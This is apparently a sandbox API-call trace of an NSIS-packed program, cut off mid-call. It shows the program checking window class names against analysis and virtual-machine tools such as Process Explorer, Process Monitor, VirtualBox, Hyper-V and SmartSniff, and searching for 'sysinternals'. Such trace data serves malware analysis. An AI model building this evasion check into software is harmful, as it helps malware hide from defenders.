[0158.531] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.531] lstrlenA (lpString="0") returned 1 [0158.531] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.531] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.531] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.531] lstrcpynA 
(in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.531] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.532] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.532] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.532] lstrlenA (lpString="0") returned 1 [0158.532] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.532] lstrlenA (lpString="") returned 0 [0158.532] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.532] lstrcpynA (in: lpString1=0x337684, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.532] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.532] lstrlenA (lpString="3399936") returned 7 [0158.532] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.532] lstrcpynA (in: lpString1=0x40a418, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.532] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.532] lstrcpynA (in: lpString1=0x337acc, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.532] lstrcpynA (in: lpString1=0x432800, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.532] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.532] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: 
lpString1="3399936") returned="3399936" [0158.532] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.532] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.532] lstrlenA (lpString="") returned 0 [0158.532] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.532] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.532] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.532] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.532] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.532] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.532] lstrlenA (lpString="") returned 0 [0158.532] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.532] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.532] lstrlenA (lpString="") returned 0 [0158.533] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.533] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.533] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.533] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: 
lpString1="") returned="" [0158.533] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.533] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.533] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.533] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.533] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.533] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.533] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.533] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.533] GetModuleHandleA 
(lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.534] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.534] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.534] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.534] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.534] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.534] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.534] lstrcpynA (in: lpString1=0x341200, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.534] lstrcpynA (in: lpString1=0x3401e0, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.534] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.534] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.534] lstrcpynA (in: lpString1=0x341200, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.534] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.534] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.534] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.534] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.535] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.535] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.535] lstrcpynA (in: 
lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.535] lstrlenA (lpString="0") returned 1 [0158.535] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.535] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.535] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.535] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.535] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.535] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.535] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.535] lstrlenA (lpString="0") returned 1 [0158.535] lstrcpynA (in: lpString1=0x33723c, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.535] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.535] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.535] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.535] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.535] lstrcpynA (in: lpString1=0x42e3a0, 
lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.535] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.535] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.536] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.536] lstrlenA (lpString="3399936") returned 7 [0158.536] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.536] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.536] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.536] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.536] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.536] 
GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.536] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.536] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.536] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.536] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.537] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="65714") returned 5 [0158.537] lstrcpyA (in: lpString1=0x430400, lpString2="65714" | out: lpString1="65714") returned="65714" [0158.537] lstrcpynA (in: lpString1=0x340df8, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.537] lstrcpynA (in: lpString1=0x33723c, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.537] lstrcpynA (in: lpString1=0x430000, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.537] lstrcpynA (in: lpString1=0x42e3a0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.537] lstrlenA (lpString="callback1") returned 9 [0158.537] lstrcpynA (in: lpString1=0x40ac18, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.537] lstrcpynA (in: lpString1=0x40b018, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.537] lstrcmpiA (lpString1="callback1", lpString2="callback1") returned 0 [0158.537] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.537] lstrcpynA (in: lpString1=0x40ac18, 
lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.537] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.537] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.537] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.537] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.537] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.537] lstrcpynA (in: lpString1=0x33723c, lpString2="user32::GetWindowText(p r1, t.r2, i1024)", iMaxLength=1024 | out: lpString1="user32::GetWindowText(p r1, t.r2, i1024)") returned="user32::GetWindowText(p r1, t.r2, i1024)" [0158.537] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.538] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: 
lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.538] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.538] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.538] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.538] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.538] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.538] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.538] lstrcpynA (in: lpString1=0x341200, lpString2="65714", iMaxLength=1024 | out: lpString1="65714") returned="65714" [0158.538] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.539] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.539] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.539] GetWindowTextA (in: hWnd=0x100b2, lpString=0x340df8, nMaxCount=1024 | out: lpString="") returned 0 [0158.539] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="1024") returned 4 [0158.539] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.539] lstrcpyA (in: lpString1=0x430800, lpString2="" | out: lpString1="") returned="" [0158.539] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="65714") returned 5 [0158.540] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") 
returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.540] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.540] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.540] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.540] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.540] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.540] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.540] lstrcpynA (in: lpString1=0x33723c, lpString2="user32::GetClassName(p r1, t.r3, i1024)", iMaxLength=1024 | out: lpString1="user32::GetClassName(p r1, t.r3, i1024)") returned="user32::GetClassName(p r1, t.r3, i1024)" [0158.540] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.540] lstrcpynA (in: lpString1=0x40a818, 
lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.540] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.540] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.541] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.541] lstrcpyA (in: lpString1=0x340df8, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.541] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.541] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.541] lstrcpynA (in: lpString1=0x340df8, lpString2="65714", iMaxLength=1024 | out: lpString1="65714") returned="65714" [0158.542] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.542] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.542] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.542] GetClassNameA (in: hWnd=0x100b2, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0158.542] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.542] lstrcpynA (in: lpString1=0x341200, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.542] lstrcpyA (in: lpString1=0x430c00, lpString2="tooltips_class32" | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.542] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="65714") 
returned 5 [0158.542] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.542] lstrlenA (lpString="0") returned 1 [0158.542] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.542] lstrlenA (lpString="tooltips_class32") returned 16 [0158.542] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.542] lstrcpynA (in: lpString1=0x40b018, lpString2="PROCEXPL", iMaxLength=1024 | out: lpString1="PROCEXPL") returned="PROCEXPL" [0158.542] lstrcmpiA (lpString1="tooltips_class32", lpString2="PROCEXPL") returned 1 [0158.542] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.542] lstrlenA (lpString="tooltips_class32") returned 16 [0158.542] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.542] lstrcpynA (in: lpString1=0x40b018, lpString2="PROCMON_WINDOW_CLASS", iMaxLength=1024 | out: lpString1="PROCMON_WINDOW_CLASS") returned="PROCMON_WINDOW_CLASS" [0158.543] lstrcmpiA (lpString1="tooltips_class32", lpString2="PROCMON_WINDOW_CLASS") returned 1 [0158.543] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.543] lstrlenA (lpString="tooltips_class32") returned 16 [0158.543] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.543] lstrcpynA (in: lpString1=0x40b018, lpString2="VBoxTrayToolWndClass", iMaxLength=1024 | out: lpString1="VBoxTrayToolWndClass") returned="VBoxTrayToolWndClass" [0158.543] lstrcmpiA 
(lpString1="tooltips_class32", lpString2="VBoxTrayToolWndClass") returned -1 [0158.543] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.543] lstrlenA (lpString="tooltips_class32") returned 16 [0158.543] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.543] lstrcpynA (in: lpString1=0x40b018, lpString2="VMSwitchUserControlClass", iMaxLength=1024 | out: lpString1="VMSwitchUserControlClass") returned="VMSwitchUserControlClass" [0158.543] lstrcmpiA (lpString1="tooltips_class32", lpString2="VMSwitchUserControlClass") returned -1 [0158.543] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.543] lstrlenA (lpString="tooltips_class32") returned 16 [0158.543] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.543] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessLasso_Notification_Class", iMaxLength=1024 | out: lpString1="ProcessLasso_Notification_Class") returned="ProcessLasso_Notification_Class" [0158.543] lstrcmpiA (lpString1="tooltips_class32", lpString2="ProcessLasso_Notification_Class") returned 1 [0158.543] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.543] lstrlenA (lpString="tooltips_class32") returned 16 [0158.543] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.543] lstrcpynA (in: lpString1=0x40b018, lpString2="SmartSniff", iMaxLength=1024 | out: lpString1="SmartSniff") returned="SmartSniff" [0158.543] lstrcmpiA (lpString1="tooltips_class32", 
